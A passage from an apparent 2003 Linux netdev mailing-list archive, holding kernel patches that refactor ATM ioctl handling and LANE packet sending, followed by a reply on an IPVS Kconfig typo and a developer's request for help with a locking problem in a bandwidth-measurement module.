defined(CONFIG_PPPOATM_MODULE) if (pppoatm_ioctl_hook) { - ret_val = pppoatm_ioctl_hook(vcc, cmd, arg); - if (ret_val != -ENOIOCTLCMD) + error = pppoatm_ioctl_hook(vcc, cmd, arg); + if (error != -ENOIOCTLCMD) goto done; } #endif #if defined(CONFIG_ATM_BR2684) || defined(CONFIG_ATM_BR2684_MODULE) if (br2684_ioctl_hook) { - ret_val 
= br2684_ioctl_hook(vcc, cmd, arg); - if (ret_val != -ENOIOCTLCMD) + error = br2684_ioctl_hook(vcc, cmd, arg); + if (error != -ENOIOCTLCMD) goto done; } #endif - if (get_user(buf,&((struct atmif_sioc *) arg)->arg)) { - ret_val = -EFAULT; - goto done; - } - if (get_user(len,&((struct atmif_sioc *) arg)->length)) { - ret_val = -EFAULT; - goto done; - } - if (get_user(number,&((struct atmif_sioc *) arg)->number)) { - ret_val = -EFAULT; - goto done; - } - if (!(dev = atm_dev_lookup(number))) { - ret_val = -ENODEV; - goto done; - } - - size = 0; - switch (cmd) { - case ATM_GETTYPE: - size = strlen(dev->type)+1; - if (copy_to_user(buf,dev->type,size)) { - ret_val = -EFAULT; - goto done_release; - } - break; - case ATM_GETESI: - size = ESI_LEN; - if (copy_to_user(buf,dev->esi,size)) { - ret_val = -EFAULT; - goto done_release; - } - break; - case ATM_SETESI: - { - int i; - - for (i = 0; i < ESI_LEN; i++) - if (dev->esi[i]) { - ret_val = -EEXIST; - goto done_release; - } - } - /* fall through */ - case ATM_SETESIF: - { - unsigned char esi[ESI_LEN]; - - if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; - goto done_release; - } - if (copy_from_user(esi,buf,ESI_LEN)) { - ret_val = -EFAULT; - goto done_release; - } - memcpy(dev->esi,esi,ESI_LEN); - ret_val = ESI_LEN; - goto done_release; - } - case ATM_GETSTATZ: - if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; - goto done_release; - } - /* fall through */ - case ATM_GETSTAT: - size = sizeof(struct atm_dev_stats); - error = fetch_stats(dev,buf,cmd == ATM_GETSTATZ); - if (error) { - ret_val = error; - goto done_release; - } - break; - case ATM_GETCIRANGE: - size = sizeof(struct atm_cirange); - if (copy_to_user(buf,&dev->ci_range,size)) { - ret_val = -EFAULT; - goto done_release; - } - break; - case ATM_GETLINKRATE: - size = sizeof(int); - if (copy_to_user(buf,&dev->link_rate,size)) { - ret_val = -EFAULT; - goto done_release; - } - break; - case ATM_RSTADDR: - if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; - goto 
done_release; - } - atm_reset_addr(dev); - break; - case ATM_ADDADDR: - case ATM_DELADDR: - if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; - goto done_release; - } - { - struct sockaddr_atmsvc addr; - - if (copy_from_user(&addr,buf,sizeof(addr))) { - ret_val = -EFAULT; - goto done_release; - } - if (cmd == ATM_ADDADDR) - ret_val = atm_add_addr(dev,&addr); - else - ret_val = atm_del_addr(dev,&addr); - goto done_release; - } - case ATM_GETADDR: - size = atm_get_addr(dev,buf,len); - if (size < 0) - ret_val = size; - else - /* may return 0, but later on size == 0 means "don't - write the length" */ - ret_val = put_user(size, - &((struct atmif_sioc *) arg)->length) ? -EFAULT : 0; - goto done_release; - case ATM_SETLOOP: - if (__ATM_LM_XTRMT((int) (long) buf) && - __ATM_LM_XTLOC((int) (long) buf) > - __ATM_LM_XTRMT((int) (long) buf)) { - ret_val = -EINVAL; - goto done_release; - } - /* fall through */ - case ATM_SETCIRANGE: - case SONET_GETSTATZ: - case SONET_SETDIAG: - case SONET_CLRDIAG: - case SONET_SETFRAMING: - if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; - goto done_release; - } - /* fall through */ - default: - if (!dev->ops->ioctl) { - ret_val = -EINVAL; - goto done_release; - } - size = dev->ops->ioctl(dev,cmd,buf); - if (size < 0) { - ret_val = (size == -ENOIOCTLCMD ? -EINVAL : size); - goto done_release; - } - } - - if (size) - ret_val = put_user(size,&((struct atmif_sioc *) arg)->length) ? 
- -EFAULT : 0; - else - ret_val = 0; -done_release: - atm_dev_release(dev); + error = atm_dev_ioctl(cmd, arg); done: - return ret_val; + return error; } diff -Nru a/net/atm/common.h b/net/atm/common.h --- a/net/atm/common.h Mon Jun 30 13:21:27 2003 +++ b/net/atm/common.h Mon Jun 30 13:21:27 2003 @@ -18,7 +18,7 @@ int atm_sendmsg(struct socket *sock,struct msghdr *m,int total_len, struct scm_cookie *scm); unsigned int atm_poll(struct file *file,struct socket *sock,poll_table *wait); -int atm_ioctl(struct socket *sock,unsigned int cmd,unsigned long arg); +int vcc_ioctl(struct socket *sock, unsigned int cmd, unsigned long arg); int atm_setsockopt(struct socket *sock,int level,int optname,char *optval, int optlen); int atm_getsockopt(struct socket *sock,int level,int optname,char *optval, diff -Nru a/net/atm/pvc.c b/net/atm/pvc.c --- a/net/atm/pvc.c Mon Jun 30 13:21:27 2003 +++ b/net/atm/pvc.c Mon Jun 30 13:21:27 2003 @@ -74,24 +74,24 @@ static struct proto_ops SOCKOPS_WRAPPED(pvc_proto_ops) = { - family: PF_ATMPVC, + .family = PF_ATMPVC, - release: atm_release, - bind: pvc_bind, - connect: pvc_connect, - socketpair: sock_no_socketpair, - accept: sock_no_accept, - getname: pvc_getname, - poll: atm_poll, - ioctl: atm_ioctl, - listen: sock_no_listen, - shutdown: pvc_shutdown, - setsockopt: atm_setsockopt, - getsockopt: atm_getsockopt, - sendmsg: atm_sendmsg, - recvmsg: atm_recvmsg, - mmap: sock_no_mmap, - sendpage: sock_no_sendpage, + .release = atm_release, + .bind = pvc_bind, + .connect = pvc_connect, + .socketpair = sock_no_socketpair, + .accept = sock_no_accept, + .getname = pvc_getname, + .poll = atm_poll, + .ioctl = vcc_ioctl, + .listen = sock_no_listen, + .shutdown = pvc_shutdown, + .setsockopt = atm_setsockopt, + .getsockopt = atm_getsockopt, + .sendmsg = atm_sendmsg, + .recvmsg = atm_recvmsg, + .mmap = sock_no_mmap, + .sendpage = sock_no_sendpage, }; diff -Nru a/net/atm/resources.c b/net/atm/resources.c --- a/net/atm/resources.c Mon Jun 30 13:21:27 2003 +++ 
b/net/atm/resources.c Mon Jun 30 13:21:27 2003 @@ -7,6 +7,7 @@ #include #include #include +#include #include /* for barrier */ #include #include @@ -15,6 +16,7 @@ #include "common.h" #include "resources.h" +#include "addr.h" #ifndef NULL @@ -170,6 +172,240 @@ dev->ops->dev_close(dev); atm_dev_deregister(dev); } + + +static void copy_aal_stats(struct k_atm_aal_stats *from, + struct atm_aal_stats *to) +{ +#define __HANDLE_ITEM(i) to->i = atomic_read(&from->i) + __AAL_STAT_ITEMS +#undef __HANDLE_ITEM +} + + +static void subtract_aal_stats(struct k_atm_aal_stats *from, + struct atm_aal_stats *to) +{ +#define __HANDLE_ITEM(i) atomic_sub(to->i, &from->i) + __AAL_STAT_ITEMS +#undef __HANDLE_ITEM +} + + +static int fetch_stats(struct atm_dev *dev, struct atm_dev_stats *arg, int zero) +{ + struct atm_dev_stats tmp; + int error = 0; + + copy_aal_stats(&dev->stats.aal0, &tmp.aal0); + copy_aal_stats(&dev->stats.aal34, &tmp.aal34); + copy_aal_stats(&dev->stats.aal5, &tmp.aal5); + if (arg) + error = copy_to_user(arg, &tmp, sizeof(tmp)); + if (zero && !error) { + subtract_aal_stats(&dev->stats.aal0, &tmp.aal0); + subtract_aal_stats(&dev->stats.aal34, &tmp.aal34); + subtract_aal_stats(&dev->stats.aal5, &tmp.aal5); + } + return error ? 
-EFAULT : 0; +} + + +int atm_dev_ioctl(unsigned int cmd, unsigned long arg) +{ + void *buf; + int error, len, number, size = 0; + struct atm_dev *dev; + struct list_head *p; + int *tmp_buf, *tmp_p; + + switch (cmd) { + case ATM_GETNAMES: + if (get_user(buf, &((struct atm_iobuf *) arg)->buffer)) + return -EFAULT; + if (get_user(len, &((struct atm_iobuf *) arg)->length)) + return -EFAULT; + spin_lock(&atm_dev_lock); + list_for_each(p, &atm_devs) + size += sizeof(int); + if (size > len) { + spin_unlock(&atm_dev_lock); + return -E2BIG; + } + tmp_buf = kmalloc(size, GFP_ATOMIC); + if (!tmp_buf) { + spin_unlock(&atm_dev_lock); + return -ENOMEM; + } + tmp_p = tmp_buf; + list_for_each(p, &atm_devs) { + dev = list_entry(p, struct atm_dev, dev_list); + *tmp_p++ = dev->number; + } + spin_unlock(&atm_dev_lock); + error = ((copy_to_user(buf, tmp_buf, size)) || + put_user(size, &((struct atm_iobuf *) arg)->length)) + ? -EFAULT : 0; + kfree(tmp_buf); + return error; + default: + break; + } + + if (get_user(buf, &((struct atmif_sioc *) arg)->arg)) + return -EFAULT; + if (get_user(len, &((struct atmif_sioc *) arg)->length)) + return -EFAULT; + if (get_user(number, &((struct atmif_sioc *) arg)->number)) + return -EFAULT; + + if (!(dev = atm_dev_lookup(number))) + return -ENODEV; + + switch (cmd) { + case ATM_GETTYPE: + size = strlen(dev->type) + 1; + if (copy_to_user(buf, dev->type, size)) { + error = -EFAULT; + goto done; + } + break; + case ATM_GETESI: + size = ESI_LEN; + if (copy_to_user(buf, dev->esi, size)) { + error = -EFAULT; + goto done; + } + break; + case ATM_SETESI: + { + int i; + + for (i = 0; i < ESI_LEN; i++) + if (dev->esi[i]) { + error = -EEXIST; + goto done; + } + } + /* fall through */ + case ATM_SETESIF: + { + unsigned char esi[ESI_LEN]; + + if (!capable(CAP_NET_ADMIN)) { + error = -EPERM; + goto done; + } + if (copy_from_user(esi, buf, ESI_LEN)) { + error = -EFAULT; + goto done; + } + memcpy(dev->esi, esi, ESI_LEN); + error = ESI_LEN; + goto done; + } + case 
ATM_GETSTATZ: + if (!capable(CAP_NET_ADMIN)) { + error = -EPERM; + goto done; + } + /* fall through */ + case ATM_GETSTAT: + size = sizeof(struct atm_dev_stats); + error = fetch_stats(dev, buf, cmd == ATM_GETSTATZ); + if (error) + goto done; + break; + case ATM_GETCIRANGE: + size = sizeof(struct atm_cirange); + if (copy_to_user(buf, &dev->ci_range, size)) { + error = -EFAULT; + goto done; + } + break; + case ATM_GETLINKRATE: + size = sizeof(int); + if (copy_to_user(buf, &dev->link_rate, size)) { + error = -EFAULT; + goto done; + } + break; + case ATM_RSTADDR: + if (!capable(CAP_NET_ADMIN)) { + error = -EPERM; + goto done; + } + atm_reset_addr(dev); + break; + case ATM_ADDADDR: + case ATM_DELADDR: + if (!capable(CAP_NET_ADMIN)) { + error = -EPERM; + goto done; + } + { + struct sockaddr_atmsvc addr; + + if (copy_from_user(&addr, buf, sizeof(addr))) { + error = -EFAULT; + goto done; + } + if (cmd == ATM_ADDADDR) + error = atm_add_addr(dev, &addr); + else + error = atm_del_addr(dev, &addr); + goto done; + } + case ATM_GETADDR: + error = atm_get_addr(dev, buf, len); + if (error < 0) + goto done; + size = error; + /* may return 0, but later on size == 0 means "don't + write the length" */ + error = put_user(size, &((struct atmif_sioc *) arg)->length) + ? -EFAULT : 0; + goto done; + case ATM_SETLOOP: + if (__ATM_LM_XTRMT((int) (long) buf) && + __ATM_LM_XTLOC((int) (long) buf) > + __ATM_LM_XTRMT((int) (long) buf)) { + error = -EINVAL; + goto done; + } + /* fall through */ + case ATM_SETCIRANGE: + case SONET_GETSTATZ: + case SONET_SETDIAG: + case SONET_CLRDIAG: + case SONET_SETFRAMING: + if (!capable(CAP_NET_ADMIN)) { + error = -EPERM; + goto done; + } + /* fall through */ + default: + if (!dev->ops->ioctl) { + error = -EINVAL; + goto done; + } + size = dev->ops->ioctl(dev, cmd, buf); + if (size < 0) { + error = (size == -ENOIOCTLCMD ? -EINVAL : size); + goto done; + } + } + + if (size) + error = put_user(size, &((struct atmif_sioc *) arg)->length) + ? 
-EFAULT : 0; + else + error = 0; +done: + atm_dev_release(dev); + return error; +} + /* Handler for sk->destruct, invoked by sk_free() */ diff -Nru a/net/atm/resources.h b/net/atm/resources.h --- a/net/atm/resources.h Mon Jun 30 13:21:27 2003 +++ b/net/atm/resources.h Mon Jun 30 13:21:27 2003 @@ -16,6 +16,7 @@ struct sock *alloc_atm_vcc_sk(int family); void free_atm_vcc_sk(struct sock *sk); +int atm_dev_ioctl(unsigned int cmd, unsigned long arg); #ifdef CONFIG_PROC_FS diff -Nru a/net/atm/svc.c b/net/atm/svc.c --- a/net/atm/svc.c Mon Jun 30 13:21:27 2003 +++ b/net/atm/svc.c Mon Jun 30 13:21:27 2003 @@ -392,24 +392,24 @@ static struct proto_ops SOCKOPS_WRAPPED(svc_proto_ops) = { - family: PF_ATMSVC, + .family = PF_ATMSVC, - release: svc_release, - bind: svc_bind, - connect: svc_connect, - socketpair: sock_no_socketpair, - accept: svc_accept, - getname: svc_getname, - poll: atm_poll, - ioctl: atm_ioctl, - listen: svc_listen, - shutdown: svc_shutdown, - setsockopt: svc_setsockopt, - getsockopt: svc_getsockopt, - sendmsg: atm_sendmsg, - recvmsg: atm_recvmsg, - mmap: sock_no_mmap, - sendpage: sock_no_sendpage, + .release = svc_release, + .bind = svc_bind, + .connect = svc_connect, + .socketpair = sock_no_socketpair, + .accept = svc_accept, + .getname = svc_getname, + .poll = atm_poll, + .ioctl = vcc_ioctl, + .listen = svc_listen, + .shutdown = svc_shutdown, + .setsockopt = svc_setsockopt, + .getsockopt = svc_getsockopt, + .sendmsg = atm_sendmsg, + .recvmsg = atm_recvmsg, + .mmap = sock_no_mmap, + .sendpage = sock_no_sendpage, }; [atm]: cleanup warnings during compiles # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. 
# This patch includes the following deltas: # ChangeSet 1.1017 -> 1.1018 # net/atm/lec.c 1.17 -> 1.18 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/06/28 chas@relax.cmf.nrl.navy.mil 1.1018 # lec.c: # cleanup warnings during compiles # -------------------------------------------- # diff -Nru a/net/atm/lec.c b/net/atm/lec.c --- a/net/atm/lec.c Mon Jun 30 13:21:08 2003 +++ b/net/atm/lec.c Mon Jun 30 13:21:08 2003 @@ -37,6 +37,10 @@ #include #include "../bridge/br_private.h" static unsigned char bridge_ula_lec[] = {0x01, 0x80, 0xc2, 0x00, 0x00}; + +extern struct net_bridge_fdb_entry *(*br_fdb_get_hook)(struct net_bridge *br, + unsigned char *addr); +extern void (*br_fdb_put_hook)(struct net_bridge_fdb_entry *ent); #endif /* Modular too */ @@ -52,10 +56,6 @@ #else #define DPRINTK(format,args...) #endif - -extern struct net_bridge_fdb_entry *(*br_fdb_get_hook)(struct net_bridge *br, - unsigned char *addr); -extern void (*br_fdb_put_hook)(struct net_bridge_fdb_entry *ent); #define DUMP_PACKETS 0 /* 0 = None, * 1 = 30 first bytes [atm]: send queued packets right after path switch completes # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. 
# This patch includes the following deltas: # ChangeSet 1.1018 -> 1.1019 # net/atm/lec.c 1.18 -> 1.19 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/06/28 chas@relax.cmf.nrl.navy.mil 1.1019 # lec.c: # send queued packets right after path switch completes # -------------------------------------------- # diff -Nru a/net/atm/lec.c b/net/atm/lec.c --- a/net/atm/lec.c Mon Jun 30 13:20:52 2003 +++ b/net/atm/lec.c Mon Jun 30 13:20:52 2003 @@ -207,6 +207,22 @@ return 0; } +static __inline__ void +lec_send(struct atm_vcc *vcc, struct sk_buff *skb, struct lec_priv *priv) +{ + if (atm_may_send(vcc, skb->len)) { + atomic_add(skb->truesize, &vcc->sk->wmem_alloc); + ATM_SKB(skb)->vcc = vcc; + ATM_SKB(skb)->atm_options = vcc->atm_options; + priv->stats.tx_packets++; + priv->stats.tx_bytes += skb->len; + vcc->send(vcc, skb); + } else { + priv->stats.tx_dropped++; + dev_kfree_skb(skb); + } +} + static int lec_send_packet(struct sk_buff *skb, struct net_device *dev) { @@ -351,33 +367,10 @@ DPRINTK("MAC address 0x%02x:%02x:%02x:%02x:%02x:%02x\n", lec_h->h_dest[0], lec_h->h_dest[1], lec_h->h_dest[2], lec_h->h_dest[3], lec_h->h_dest[4], lec_h->h_dest[5]); - ATM_SKB(skb2)->vcc = send_vcc; - ATM_SKB(skb2)->atm_options = send_vcc->atm_options; - DPRINTK("%s:sending to vpi:%d vci:%d\n", dev->name, - send_vcc->vpi, send_vcc->vci); - if (atm_may_send(send_vcc, skb2->len)) { - atomic_add(skb2->truesize, &send_vcc->sk->wmem_alloc); - priv->stats.tx_packets++; - priv->stats.tx_bytes += skb2->len; - send_vcc->send(send_vcc, skb2); - } else { - priv->stats.tx_dropped++; - dev_kfree_skb(skb2); - } + lec_send(send_vcc, skb2, priv); } - ATM_SKB(skb)->vcc = send_vcc; - ATM_SKB(skb)->atm_options = send_vcc->atm_options; - if (atm_may_send(send_vcc, skb->len)) { - atomic_add(skb->truesize, &send_vcc->sk->wmem_alloc); - priv->stats.tx_packets++; - priv->stats.tx_bytes += skb->len; - send_vcc->send(send_vcc, skb); - } else { - 
priv->stats.tx_dropped++; - dev_kfree_skb(skb); - } - + lec_send(send_vcc, skb, priv); #if 0 /* Should we wait for card's device driver to notify us? */ dev->tbusy=0; @@ -1617,6 +1610,10 @@ && time_after_eq(now, entry->timestamp+ priv->path_switching_delay)) { + struct sk_buff *skb; + + while ((skb = skb_dequeue(&entry->tx_wait))) + lec_send(entry->vcc, skb, entry->priv); entry->last_used = jiffies; entry->status = ESI_FORWARD_DIRECT; @@ -2010,6 +2007,10 @@ for (entry=priv->lec_arp_tables[i];entry;entry=entry->next) { if (entry->flush_tran_id == tran_id && entry->status == ESI_FLUSH_PENDING) { + struct sk_buff *skb; + + while ((skb = skb_dequeue(&entry->tx_wait))) + lec_send(entry->vcc, skb, entry->priv); entry->status = ESI_FORWARD_DIRECT; DPRINTK("LEC_ARP: Flushed\n"); } [atm]: cleanup pppoatm_ioctl_hook # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.1019 -> 1.1020 # net/atm/pppoatm.c 1.5 -> 1.6 # net/atm/common.h 1.3 -> 1.4 # net/atm/common.c 1.19 -> 1.20 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/06/28 chas@relax.cmf.nrl.navy.mil 1.1020 # pppoatm.c, common.h, common.c: # cleanup pppoatm_ioctl_hook # -------------------------------------------- # diff -Nru a/net/atm/common.c b/net/atm/common.c --- a/net/atm/common.c Mon Jun 30 13:20:21 2003 +++ b/net/atm/common.c Mon Jun 30 13:20:21 2003 @@ -130,8 +130,19 @@ #endif #if defined(CONFIG_PPPOATM) || defined(CONFIG_PPPOATM_MODULE) -int (*pppoatm_ioctl_hook)(struct atm_vcc *, unsigned int, unsigned long); -EXPORT_SYMBOL(pppoatm_ioctl_hook); +static DECLARE_MUTEX(pppoatm_ioctl_mutex); + +static int (*pppoatm_ioctl_hook)(struct atm_vcc *, unsigned int, unsigned long); + +void pppoatm_ioctl_set(int (*hook)(struct atm_vcc *, unsigned int, unsigned long)) +{ + 
down(&pppoatm_ioctl_mutex); + pppoatm_ioctl_hook = hook; + up(&pppoatm_ioctl_mutex); +} +#ifdef CONFIG_PPPOATM_MODULE +EXPORT_SYMBOL(pppoatm_ioctl_set); +#endif #endif #if defined(CONFIG_ATM_BR2684) || defined(CONFIG_ATM_BR2684_MODULE) @@ -806,12 +817,14 @@ default: break; } + error = -ENOIOCTLCMD; #if defined(CONFIG_PPPOATM) || defined(CONFIG_PPPOATM_MODULE) - if (pppoatm_ioctl_hook) { + down(&pppoatm_ioctl_mutex); + if (pppoatm_ioctl_hook) error = pppoatm_ioctl_hook(vcc, cmd, arg); - if (error != -ENOIOCTLCMD) - goto done; - } + up(&pppoatm_ioctl_mutex); + if (error != -ENOIOCTLCMD) + goto done; #endif #if defined(CONFIG_ATM_BR2684) || defined(CONFIG_ATM_BR2684_MODULE) if (br2684_ioctl_hook) { diff -Nru a/net/atm/common.h b/net/atm/common.h --- a/net/atm/common.h Mon Jun 30 13:20:21 2003 +++ b/net/atm/common.h Mon Jun 30 13:20:21 2003 @@ -28,6 +28,8 @@ void atm_release_vcc_sk(struct sock *sk,int free_sk); void atm_shutdown_dev(struct atm_dev *dev); +void pppoatm_ioctl_set(int (*hook)(struct atm_vcc *, unsigned int, unsigned long)); + int atmpvc_init(void); void atmpvc_exit(void); int atmsvc_init(void); diff -Nru a/net/atm/pppoatm.c b/net/atm/pppoatm.c --- a/net/atm/pppoatm.c Mon Jun 30 13:20:21 2003 +++ b/net/atm/pppoatm.c Mon Jun 30 13:20:21 2003 @@ -44,6 +44,8 @@ #include #include +#include "common.h" + #if 0 #define DPRINTK(format, args...) 
\ printk(KERN_DEBUG "pppoatm: " format, ##args) @@ -344,17 +346,15 @@ /* the following avoids some spurious warnings from the compiler */ #define UNUSED __attribute__((unused)) -extern int (*pppoatm_ioctl_hook)(struct atm_vcc *, unsigned int, unsigned long); - static int __init UNUSED pppoatm_init(void) { - pppoatm_ioctl_hook = pppoatm_ioctl; + pppoatm_ioctl_set(pppoatm_ioctl); return 0; } static void __exit UNUSED pppoatm_exit(void) { - pppoatm_ioctl_hook = NULL; + pppoatm_ioctl_set(NULL); } module_init(pppoatm_init); [atm]: cleanup br2684_ioctl_hook # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.1020 -> 1.1021 # net/atm/common.h 1.4 -> 1.5 # net/atm/common.c 1.20 -> 1.21 # net/atm/br2684.c 1.4 -> 1.5 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/06/28 chas@relax.cmf.nrl.navy.mil 1.1021 # common.h, common.c, br2684.c: # cleanup br2684_ioctl_hook # -------------------------------------------- # diff -Nru a/net/atm/br2684.c b/net/atm/br2684.c --- a/net/atm/br2684.c Mon Jun 30 13:20:06 2003 +++ b/net/atm/br2684.c Mon Jun 30 13:20:06 2003 @@ -16,9 +16,12 @@ #include #include #include +#include +#include #include +#include "common.h" #include "ipcommon.h" /* @@ -768,8 +771,6 @@ extern struct proc_dir_entry *atm_proc_root; /* from proc.c */ -extern int (*br2684_ioctl_hook)(struct atm_vcc *, unsigned int, unsigned long); - /* the following avoids some spurious warnings from the compiler */ #define UNUSED __attribute__((unused)) @@ -779,14 +780,14 @@ if ((p = create_proc_entry("br2684", 0, atm_proc_root)) == NULL) return -ENOMEM; p->proc_fops = &br2684_proc_operations; - br2684_ioctl_hook = br2684_ioctl; + br2684_ioctl_set(br2684_ioctl); return 0; } static void __exit UNUSED br2684_exit(void) { struct br2684_dev *brdev; - 
br2684_ioctl_hook = NULL; + br2684_ioctl_set(NULL); remove_proc_entry("br2684", atm_proc_root); while (!list_empty(&br2684_devs)) { brdev = list_entry_brdev(br2684_devs.next); diff -Nru a/net/atm/common.c b/net/atm/common.c --- a/net/atm/common.c Mon Jun 30 13:20:06 2003 +++ b/net/atm/common.c Mon Jun 30 13:20:06 2003 @@ -146,10 +146,19 @@ #endif #if defined(CONFIG_ATM_BR2684) || defined(CONFIG_ATM_BR2684_MODULE) -int (*br2684_ioctl_hook)(struct atm_vcc *, unsigned int, unsigned long); -#endif +static DECLARE_MUTEX(br2684_ioctl_mutex); + +static int (*br2684_ioctl_hook)(struct atm_vcc *, unsigned int, unsigned long); + +void br2684_ioctl_set(int (*hook)(struct atm_vcc *, unsigned int, unsigned long)) +{ + down(&br2684_ioctl_mutex); + br2684_ioctl_hook = hook; + up(&br2684_ioctl_mutex); +} #ifdef CONFIG_ATM_BR2684_MODULE -EXPORT_SYMBOL(br2684_ioctl_hook); +EXPORT_SYMBOL(br2684_ioctl_set); +#endif #endif #include "resources.h" /* atm_find_dev */ @@ -827,11 +836,12 @@ goto done; #endif #if defined(CONFIG_ATM_BR2684) || defined(CONFIG_ATM_BR2684_MODULE) - if (br2684_ioctl_hook) { + down(&br2684_ioctl_mutex); + if (br2684_ioctl_hook) error = br2684_ioctl_hook(vcc, cmd, arg); - if (error != -ENOIOCTLCMD) - goto done; - } + up(&br2684_ioctl_mutex); + if (error != -ENOIOCTLCMD) + goto done; #endif error = atm_dev_ioctl(cmd, arg); diff -Nru a/net/atm/common.h b/net/atm/common.h --- a/net/atm/common.h Mon Jun 30 13:20:06 2003 +++ b/net/atm/common.h Mon Jun 30 13:20:06 2003 @@ -29,6 +29,7 @@ void atm_shutdown_dev(struct atm_dev *dev); void pppoatm_ioctl_set(int (*hook)(struct atm_vcc *, unsigned int, unsigned long)); +void br2684_ioctl_set(int (*hook)(struct atm_vcc *, unsigned int, unsigned long)); int atmpvc_init(void); void atmpvc_exit(void); From ratz@drugphish.ch Mon Jul 14 13:16:29 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 13:16:45 -0700 (PDT) Received: from mailphish.drugphish.ch (adsl-196-233.cybernet.ch [212.90.196.233]) by oss.sgi.com 
(8.12.9/8.12.9) with SMTP id h6EKGOFl032474 for ; Mon, 14 Jul 2003 13:16:27 -0700 Received: from drugphish.ch (unknown [172.23.2.31]) by mailphish.drugphish.ch (drugphish mail transportation agency) with ESMTP id 81109315A; Mon, 14 Jul 2003 19:56:45 +0000 (/etc/localtime) Message-ID: <3F130F84.8010104@drugphish.ch> Date: Mon, 14 Jul 2003 22:16:04 +0200 From: Roberto Nibali User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.3) Gecko/20030611 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Alberto Bertogli Cc: netdev@oss.sgi.com, linux-net@vger.kernel.org, linux-kernel@vger.kernel.org Subject: Re: [PATCH] IPVS' Kconfig LBLC and LBLCR configuration typo References: <20030714140350.GB1389@telpin.com.ar> In-Reply-To: <20030714140350.GB1389@telpin.com.ar> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4020 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ratz@drugphish.ch Precedence: bulk X-list: netdev Hello, > --- Kconfig.orig 2003-07-14 10:32:06.000000000 -0300 > +++ Kconfig 2003-07-14 10:32:57.000000000 -0300 > @@ -147,7 +147,7 @@ > unsure, say N. > > config IP_VS_LBLC > - tristate "locality-based least-connection with replication scheduling" > + tristate "locality-based least-connection scheduling" > depends on IP_VS > ---help--- > The locality-based least-connection scheduling algorithm is for > @@ -163,7 +163,7 @@ > unsure, say N. > > config IP_VS_LBLCR > - tristate "locality-based least-connection with replication schedulin" > + tristate "locality-based least-connection with replication scheduling" > depends on IP_VS > ---help--- > The locality-based least-connection with replication scheduling Obviously correct. Dave, if you haven't already, please apply to your tree, thanks. We're working on the 2.4.x patch ;). 
Best regards, Roberto Nibali, ratz -- echo '[q]sa[ln0=aln256%Pln256/snlbx]sb3135071790101768542287578439snlbxq'|dc From nalkunda@egr.msu.edu Mon Jul 14 14:53:52 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 14:54:05 -0700 (PDT) Received: from sys09.mail.msu.edu (sys09.mail.msu.edu [35.9.75.109]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6ELrpFl012923 for ; Mon, 14 Jul 2003 14:53:52 -0700 Received: from elans.cse.msu.edu ([35.9.43.164] helo=elans-pc.elans.cse.msu.edu) by sys09.mail.msu.edu with asmtp (Exim 4.10 #3) (TLSv1:RC4-MD5:128) (authenticated as nalkunda) id 19cBGT-000IoI-00; Mon, 14 Jul 2003 17:53:45 -0400 From: N N Ashok Organization: CSE, Michigan State University To: netdev@oss.sgi.com Subject: Kernel locking up in module Date: Mon, 14 Jul 2003 17:46:30 -0400 User-Agent: KMail/1.4.3 MIME-Version: 1.0 Content-Type: Multipart/Mixed; boundary="------------Boundary-00=_I5B1Z16K2MEMVO8EMDU8" Message-Id: <200307141746.30761.nalkunda@egr.msu.edu> X-archive-position: 4021 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: nalkunda@egr.msu.edu Precedence: bulk X-list: netdev --------------Boundary-00=_I5B1Z16K2MEMVO8EMDU8 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Hi All, I am creating a module to measure the outgoing bandwidth usage on the interfaces. It uses the get_stats() of the device to get the current stats and then computes the bandwidth usage. The algorithm for the usage calculation is borrowed from the iproute2 package (tc/tc_estimator.c). The problem is that the kernel keeps locking up. I am using rwlock_t locks to lock the data.
In the code, I traverse the list of bwusage structures and as a debug message am printing whether the traversal ended in the variable becoming null (which it should if everything went right), but the variable is non-null every other time I insert the module. printk(KERN_INFO "bwestimator: dev: %s. bwusage: %s.\n", dev ? "non-null" : "null", bwusage ? "non-null" : "null"); I think this has got to do with some locking issues. As this is my first go at the kernel locking, I might have used the wrong kind of locks. I have attached the module source, header and the log messages as I inserted the module a couple of times. I request you all to please help me as I am totally lost here. Thanks, Ashok --------------Boundary-00=_I5B1Z16K2MEMVO8EMDU8 Content-Type: text/x-csrc; charset="us-ascii"; name="bwestimator.c" Content-Transfer-Encoding: 7bit Content-Disposition: attachment; filename="bwestimator.c" #include #include #include #include #include #include #include #if CONFIG_MODVERSIONS==1 #define MODVERSIONS #include #endif /** Timer */ struct timer_list estimator_timer; /** Moving average weight */ unsigned interval, time_const; int ewma_log; int idx; /** Function to check bandwidth usage */ void check_bandwidth(unsigned long ptr); /** * init_module: Module init function */ int init_module() { struct net_device *dev; struct bwusage *current_bwusage; /** * Temporarily used to stop the timer after a specific number of times */ unsigned long value; EXPORT_NO_SYMBOLS; /** * 